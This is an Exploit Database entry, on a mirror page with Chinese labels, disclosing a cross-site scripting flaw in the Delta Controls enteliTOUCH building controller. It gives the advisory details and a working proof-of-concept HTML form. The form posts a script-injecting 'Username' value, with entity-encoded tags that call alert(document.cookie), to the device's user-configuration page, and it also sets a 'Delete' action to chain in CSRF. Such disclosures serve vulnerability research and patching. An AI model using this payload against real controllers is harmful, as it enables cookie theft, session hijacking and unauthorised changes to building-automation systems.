Delta Controls enteliTOUCH 3.40.3935 – Cross-Site Scripting (XSS)

• Exploit Database
• 21 阅读

• 作者： LiquidWorm
  日期： 2022-04-19
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50879/

• # Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
  # Exploit Author: LiquidWorm
  
  <!DOCTYPE html>
  <html>
  <head><title>enteliTouch XSS</title></head>
  <body>
  <!--
  
  Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
  
  
  Vendor: Delta Controls Inc.
  Product web page: https://www.deltacontrols.com
  Affected version: 3.40.3935
  3.40.3706
  3.33.4005
  
  Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
  access to the heart of your BAS. The enteliTOUCH has a 7-inch,
  high-resolution display that serves as an interface to your building.
  Use it as your primary interface for smaller facilities or as an
  on-the-spot access point for larger systems. The intuitive,
  easy-to-navigate interface gives instant access to manage your BAS.
  
  Desc: Input passed to the POST parameter 'Username' is not properly
  sanitised before being returned to the user. This can be exploited
  to execute arbitrary HTML code in a user's browser session in context
  of an affected site.
  
  Tested on: DELTA enteliTOUCH
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5703
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
  
  
  06.04.2022
  
  -->
  
  
  <form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
  <input type="hidden" name="userInfo" value="" />
  <input type="hidden" name="UL&#95;SelectedOptionId" value="" />
  <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" />
  <input type="hidden" name="formAction" value="Delete" />
  <input type="submit" value="CSRF XSS Alert!" />
  </form>
  
  </body>
  </html>